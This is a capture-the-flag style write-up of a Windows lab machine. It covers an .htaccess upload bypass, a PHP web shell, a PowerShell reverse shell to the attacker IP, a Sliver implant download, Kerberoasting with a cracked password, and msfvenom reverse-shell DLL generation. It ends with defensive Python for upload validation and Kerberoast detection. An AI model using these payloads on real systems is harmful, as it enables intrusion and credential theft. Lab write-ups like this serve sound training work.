# Access Writeup

## Enumeration

### SMB - 445

- null auth denied
- guest disabled

### Access WAPP - HTTP 80

File upload:

![[Pasted image 20250402103420.png]]

Files end up at: `http://192.168.188.187/uploads/`

We're not initially permitted to upload `.php` files. But come to find out, we're permitted to upload `.htaccess` files:

```
POST /Ticket.php HTTP/1.1
Host: 192.168.188.187
Content-Length: 823
Cache-Control: max-age=0
Origin: http://192.168.188.187
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryb8OQl9cku4gtHTZB
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://192.168.188.187/
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive

------WebKitFormBoundaryb8OQl9cku4gtHTZB
Content-Disposition: form-data; name="your-name"

haxor
------WebKitFormBoundaryb8OQl9cku4gtHTZB
Content-Disposition: form-data; name="your-email"

haxor
------WebKitFormBoundaryb8OQl9cku4gtHTZB
Content-Disposition: form-data; name="ticket-type"

standard-access
------WebKitFormBoundaryb8OQl9cku4gtHTZB
Content-Disposition: form-data; name="the_file"; filename=".htaccess"
Content-Type: text/plain

AddType application/x-httpd-php .dork
------WebKitFormBoundaryb8OQl9cku4gtHTZB
Content-Disposition: form-data; name="submit"

Purchase
------WebKitFormBoundaryb8OQl9cku4gtHTZB--
```

We can now upload and execute `.dork` files as if they were `.php` files.

```
Content-Disposition: form-data; name="the_file"; filename="hax.dork"
Content-Type: text/plain

<?php
if (isset($_GET['cmd'])) {
    echo "<pre>" . shell_exec($_GET['cmd']) . "</pre>";
}
?>
```

We can now invoke `http://192.168.188.187/uploads/hax.dork?cmd=whoami` which yields `access\svc_apache`:

![[Pasted image 20250402105530.png]]

Next up I'd like to attempt to upload a sliver implant and then use the abovementioned shell to invoke it.

Took 25 minutes to get to this point <3.

Hit a snag here with my setup. The browser I'm running is on my local machine, but my sliver client is on my remote system. So that means I'll either have to do a file transfer from my remote system to my local system and then finally to the target system, or I shall have to improve my setup and use a solution akin to remote desktop protocols: run the browser on the remote system and then connect to the UI via my local terminal.

For now I'll simply add an intermediary step, which would prolly be best practice anyways. I'll leverage the simplistic `?cmd=` shell to spawn a proper remote shell:

```
GET /uploads/hax.dork?cmd=powershell%20-nop%20-c%20%22%24client%20%3D%20New-Object%20System.Net.Sockets.TCPClient%28%27192.168.45.231%27%2C445%29%3B%24stream%20%3D%20%24client.GetStream%28%29%3B%5Bbyte%5B%5D%5D%24bytes%20%3D%200..65535%7C%25%7B0%7D%3Bwhile%28%28%24i%20%3D%20%24stream.Read%28%24bytes%2C%200%2C%20%24bytes.Length%29%29%20-ne%200%29%7B%3B%24data%20%3D%20%28New-Object%20-TypeName%20System.Text.ASCIIEncoding%29.GetString%28%24bytes%2C0%2C%20%24i%29%3B%24sendback%20%3D%20%28iex%20%24data%202%3E%261%20%7C%20Out-String%20%29%3B%24sendback2%20%3D%20%24sendback%20%2B%20%27PS%20%27%20%2B%20%28pwd%29.Path%20%2B%20%27%3E%20%27%3B%24sendbyte%20%3D%20%28%5Btext.encoding%5D%3A%3AASCII%29.GetBytes%28%24sendback2%29%3B%24stream.Write%28%24sendbyte%2C0%2C%24sendbyte.Length%29%3B%24stream.Flush%28%29%7D%3B%24client.Close%28%29%22 HTTP/1.1
Host: 192.168.188.187
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/131.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en-US,en;q=0.9
Connection: keep-alive
```

This yields a connection back to my `netcat` listener:

```sh
╭─[λ]-[/targets/access]-[192.168.188.187]
╰─> rlwrap nc -lnvp 445
listening on [any] 445 ...
connect to [192.168.45.231] from (UNKNOWN) [192.168.188.187] 50148
whoami
access\svc_apache
```

We can now go ahead and improve our access level by:

1. Instantiating a file server on my attacker system to serve up the payload
2. Executing a simple `curl` command on the target system to download the payload

Serving up the implant:

```
╭─[λ]-[/targets/access]-[192.168.188.187]
╰─> python3 -m http.server 443
Serving HTTP on 0.0.0.0 port 443 (http://0.0.0.0:443/) ...
```

And downloading it onto the remote system:

```
PS C:\xampp\htdocs\uploads> curl http://192.168.45.231:443/access.exe -o access.exe
PS C:\xampp\htdocs\uploads> ls


    Directory: C:\xampp\htdocs\uploads


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----         4/2/2025   1:48 AM             38 .htaccess
-a----         4/2/2025   2:16 AM       10981376 access.exe
-a----         4/2/2025   1:54 AM            100 hax.dork
-a----         4/2/2025   1:45 AM            219 haxor.asp
-a----         4/2/2025   1:41 AM            100 haxor.php.txt
-a----         4/2/2025   1:42 AM            100 haxor.php;.txt
-a----         4/2/2025   1:36 AM              6 haxor.txt
-a----         4/2/2025   1:53 AM            100 hello.dork


PS C:\xampp\htdocs\uploads> .\access.exe
```

Aaaaand I'm granted a session on my sliver server:

```
[*] Session 13f539f5 access - 192.168.188.187:50180 (SERVER) - windows/amd64 - Wed, 02 Apr 2025 09:18:40 UTC

sliver >
```

## Lateral Movement - Kerberoasting `svc_mssql`

At this point I realized I was missing some of my tooling due to migrating my haxor machine to a cloud based headless setup.
Specifically I was missing:

- Bloodhound Ingestors
- Rubeus

Managed to get both installed, as well as generating a bloodhound collection dump and downloading it onto my remote system. Buuuuut, now facing the same issue: bloodhound UI is running on my local browser, whereas the bloodhound dump data is located on the remote system...

Need a permanent fix for this ordeal, which would definitely be a "remote browser". Could also be nice to have an NFS system on my network for general file sharing.

Anyways, once I solved the issue I immediately went ahead and searched for kerberoastable users:

Aaaand lo and behold we got `svc_mssql`:

![[Pasted image 20250402115049.png]]

I smell DC-ADMIN here <3

I'll go ahead and execute the kerberoast using the sliver implant:

```
sliver (access) > rubeus -- kerberoast /nowrap

[*] rubeus output:

   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.2


[*] Action: Kerberoasting

[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*]         Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.

[*] Target Domain          : access.offsec
[*] Searching path 'LDAP://SERVER.access.offsec/DC=access,DC=offsec' for '(&(samAccountType=805306368)(servicePrincipalName=*)(!samAccountName=krbtgt)(!(UserAccountControl:1.2.840.113556.1.4.803:=2)))'

[*] Total kerberoastable users : 1


[*] SamAccountName         : svc_mssql
[*] DistinguishedName      : CN=MSSQL,CN=Users,DC=access,DC=offsec
[*] ServicePrincipalName   : MSSQLSvc/DC.access.offsec
[*] PwdLastSet             : 5/21/2022 5:33:45 AM
[*] Supported ETypes       : RC4_HMAC_DEFAULT
[*] Hash                   : $krb5tgs$23$*svc_mssql$access.offsec$MSSQLSvc/[email protected]*$3A06B33C4D82762371C80CE4934511EA$F9F16F2BC7AAA40E007436357EC4A685E63EEAC8C0FD25FC74B233E3E4F657BA6B32708B111F3760254AB75E85CFA912CD32C1A2A108F081329FD2BC60B27CC4D7FA05F9D3D99521156E79F50B6ED5709E1831DB32177BDDDD402D84373BD4C754CDF7E842452641C0D28CB80BC7884F5399E35F833D2BBF11E37A2EFC40400D8E78EBA3CE94DC291CBDFC6292BEA5981EE35A760DE50D0739241FA2B83D64B89BA622C5DD3270FE2249930071DE6990D3B364C50D4DF39BC6B4C1A487011B802AA75C115351EDF0B27FE179B12B01F74EAD022A4A42594D216130B136B53BB4F9E379324C980018B5763B1022C8DC6127D2A441E7CD4B0479A5ED2D42F8080EE93298CDC4C078842CCC83BA163B15785FB9CFD230736D580C45105CE75D8EA139AC319CC1429FE5C51F571B08EE290D0BE7251345BCA3FDF6F93584FA74E6D1527C5AB8328AEFD5E7713A5CA49A3606CEFD724B44F178CDC85BC6C98873FAF6A2558486E02A2C11EABAE4EAF8E76203765E391E7B6148E2D7CDB5F211E3E305920AE803E1313C112B9AAE80F7BD2D0D959CD55031AA6E0733D792D31FB0DCD481D72D4152ECB394FB659C6F2684F0900FEC85D3067A9DA1D7B922640927655B60902BBFAAC32397E886C6373561B9D7D4E53F92FB0EAB41F41CEA36D7FF7921AB5FDE5112BD04B1962A8BC1FEF725400311E64A82B8A474F8C511EC91B19D984ED8D8D1C50AEE57A264D93DFA6D763BA437852F04F363AA5767844FC3A7B012B8C3185C630A22B46103C0AFEA75BF0F53586FF85FFF05E4842CE87D2EDA1B9DA49C2B0779365EF9E49FD23EF2549E28EE9103419A0572D30E534E4F8F687BEA42CFB4C41832AB840E5B161A9767252FD3F2A8527B6877E2787B6DF0A0A5880EA17777642C801B9EEE2A6A5D4CFBC4CB01673BEAB9E4B67C4CAA62B31441865F837C5541E5A05F7CC44967EDFCB54EF5AD5399F63250751B9205EB241C4A5AA3D9DC1F5678224140B1C1C06AF8A324653064D08EA491A9F73C3B25BA4196C1181FBBBD53CC322E064EE27E08D1B2A88284314F8BBAD998EA380D9B384A3DEF889BB9792ABAF8467149039ECD051F43CE1698EC1DCB6CE44996F9681F4E0315D0BD22EB1F1694420F9EB43A812289E95622B0295AE44C9210369168B01FCD059158EE46F7263FC72E364E4E566BDAD5DCA0CD1EF20307EB04DD6B207CC70E73F12F39BD2D0B2CBA429A5F842610F51656ECEB61C5F86A875C276AF71C70BEEF1D254360CDFECEC091D2311A27A0DEA3D91B020E64CA7CA3FF7CD4E3186A167E0E17D085F2DA2826CB286A66A22B18C91B3A167DB25B41A8DB1BF97A3A92B098F88ECC3DFE58820629F8B46D3C27DBC443F5515375AF33ADFEB557CCFABE5052B3785108902D7A14F63ADE7B6734E28C72ECCC04C2E1CD0095130B5681C1E67F1DB42ED0BC08A6FA6C093406C6E0C4BEC36D3EEB1ADA472FA41C9ABF64F933258D01E4D2A7F2CAB3273231FEB2B0B70757447ED7E8C3C5E86CE070A1C654DC36571BE4678D30D6C33DF694637ABF137306A2B50AC9B0E0B2D80D92F766C601A8515A977B856C6E9DE4C7815A53C36AB3AE41EB
```

We get a noice hash, let's attempt to crack dat:

```
╭─[λ]-[/targets/access]-[192.168.188.187]
╰─> touch svc_mssql.hash

╭─[λ]-[/targets/access]-[192.168.188.187]
╰─> vi svc_mssql.hash # copy paste the hash into the file

╭─[λ]-[/targets/access]-[192.168.188.187]
╰─> john svc_mssql.hash -w=/arsenal/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS-REP etype 23 [MD4 HMAC-MD5 RC4])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
trustno1         (?)
1g 0:00:00:00 DONE (2025-04-02 09:55) 100.0g/s 51200p/s 51200c/s 51200C/s hockey..bethany
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
```

Seems we got a nice password: `trustno1`, let's try that out:

```
╭─[λ]-[/targets/access]-[192.168.188.187]
╰─> nxc smb $RHOST -u 'svc_mssql' -p 'trustno1'
SMB         192.168.188.187 445    SERVER           [*] Windows 10 / Server 2019 Build 17763 x64 (name:SERVER) (domain:access.offsec) (signing:True) (SMBv1:False)
SMB         192.168.188.187 445    SERVER           [+] access.offsec\svc_mssql:trustno1
```

Okay, we're now at `01:30` for time, prolly spent half that fucking around with tooling...

## `svc_mssql`

- smb
  - can `RW` on `SYSVOL` and other standard shares
  - dumped it, nothing interesting.
- so apparently the `svc_mssql` user had some [[SeVolume]] priv (had to take a hint here).
  - but got no idea how the fuck i get the remote access for `svc_mssql`, possibly runas?
  - yup, took a hint there too. Need to sharpen up the practice a little

```
sliver (access) > runas --username svc_mssql --password trustno1 -p /xampp/htdocs/uploads/access.exe
```

And we get a sliver session as `svc_mssql` <3

Next we run `whoami /priv` and see that we got [[SeManageVolume]] which can be exploited to get Administrative access:

```shell
msfvenom -p windows/x64/shell_reverse_tcp LHOST=<your_ip> LPORT=<your_port> -f dll -o revshell.dll
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=443 -f dll -o revshell.dll
```

Then inside the sliver session we'll go ahead and upload it:

```
upload revshell.dll
```

## Lessons Learned

- Better tool prep
- Should have trusted my instinct and used Runas
- Practiced generating DLLs
- Should have done my windows privesc better
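
The upload form in the Enumeration section refused `.php` but accepted `.htaccess` and then `.dork`, which is how a deny-list filter behaves. As an added example (not code from the target application or from these notes), here is an allow-list filename check in Python run over the filenames from the uploads directory listing; the allowed extension set and the function names are assumptions.

```python
import os
import re
import secrets

# Assumption: the ticket form only needs these attachment types.
ALLOWED_EXTENSIONS = {".txt", ".pdf", ".png", ".jpg"}
# One base name, one dot, one extension; nothing else.
SAFE_NAME = re.compile(r"[A-Za-z0-9_-]+\.[A-Za-z0-9]+")

# Filenames from the uploads directory listing in this writeup.
SAMPLES = [".htaccess", "hax.dork", "haxor.asp", "haxor.php.txt",
           "haxor.php;.txt", "haxor.txt", "hello.dork"]


def validate_upload(client_filename):
    """Return (accepted, reason) for a client-supplied filename."""
    # Discard directory components, whichever separator the client used.
    name = client_filename.replace("\\", "/").rsplit("/", 1)[-1]
    if not name or name.startswith("."):
        # .htaccess, .user.ini and other per-directory config files.
        return False, "dotfile"
    if not SAFE_NAME.fullmatch(name):
        # Rejects double extensions, ';', spaces, newlines and trailing dots.
        return False, "unsafe name"
    ext = os.path.splitext(name)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:
        # Unknown extensions (.dork, .asp) fail closed.
        return False, "extension not allowed"
    return True, "ok"


def stored_name(client_filename):
    """Pick the on-disk name server-side; keep only the vetted extension."""
    accepted, reason = validate_upload(client_filename)
    if not accepted:
        raise ValueError(reason)
    ext = os.path.splitext(client_filename)[1].lower()
    return secrets.token_hex(16) + ext


def report(names=SAMPLES):
    """Map each sample filename to True (accepted) or False (rejected)."""
    return {name: validate_upload(name)[0] for name in names}


if __name__ == "__main__":
    for name, accepted in report().items():
        print(f"{name:16} {'accept' if accepted else 'reject'}")
```

Setting `AllowOverride None` for the uploads directory in the Apache configuration makes the server ignore any `.htaccess` that does reach disk.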
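
On the defensive side of the Kerberoasting step, the RC4 (etype 23) service ticket requested for `svc_mssql` is recorded on the domain controller as Security event 4769. An added example, not part of the original notes: a Python filter over constructed 4769 records that flags RC4 tickets issued for user-backed service accounts; the sample events and the `svc_web` and `alice` accounts are made up.

```python
# Kerberos encryption type codes as logged in TicketEncryptionType.
RC4_ETYPES = {0x17, 0x18}  # RC4-HMAC, RC4-HMAC-EXP

# Constructed sample records. Field names follow Windows Security event 4769
# ("A Kerberos service ticket was requested"); all values are made up.
EVENTS = [
    {"EventID": 4769, "TargetUserName": "svc_apache@ACCESS.OFFSEC",
     "ServiceName": "svc_mssql", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:192.168.188.187", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "SERVER$@ACCESS.OFFSEC",
     "ServiceName": "SERVER$", "TicketEncryptionType": "0x12",
     "IpAddress": "::1", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@ACCESS.OFFSEC",
     "ServiceName": "svc_web", "TicketEncryptionType": "0x12",
     "IpAddress": "::ffff:192.168.188.50", "Status": "0x0"},
    {"EventID": 4769, "TargetUserName": "alice@ACCESS.OFFSEC",
     "ServiceName": "krbtgt", "TicketEncryptionType": "0x17",
     "IpAddress": "::ffff:192.168.188.50", "Status": "0x0"},
    {"EventID": 4624, "TargetUserName": "alice", "IpAddress": "192.168.188.50"},
]


def is_roast_candidate(ev):
    """True for a successful RC4 service ticket issued for a user-backed SPN."""
    if ev.get("EventID") != 4769 or int(ev.get("Status", "0x1"), 16) != 0:
        return False
    service = ev.get("ServiceName", "")
    # Machine accounts ($) and krbtgt have long random keys; skip them.
    if service.endswith("$") or service.lower() == "krbtgt":
        return False
    return int(ev.get("TicketEncryptionType", "0x0"), 16) in RC4_ETYPES


def rc4_ticket_alerts(events):
    """Return (requester, service, source_ip) for every flagged event."""
    alerts = []
    for ev in events:
        if is_roast_candidate(ev):
            requester = ev["TargetUserName"].split("@")[0]
            ip = ev["IpAddress"].replace("::ffff:", "")  # strip IPv4-mapped prefix
            alerts.append((requester, ev["ServiceName"], ip))
    return alerts


if __name__ == "__main__":
    for alert in rc4_ticket_alerts(EVENTS):
        print("RC4 service ticket: %s -> %s from %s" % alert)
```

The filter only carries signal where legitimate clients negotiate AES; the `RC4_HMAC_DEFAULT` value in the Rubeus output indicates no explicit encryption types were configured on `svc_mssql`.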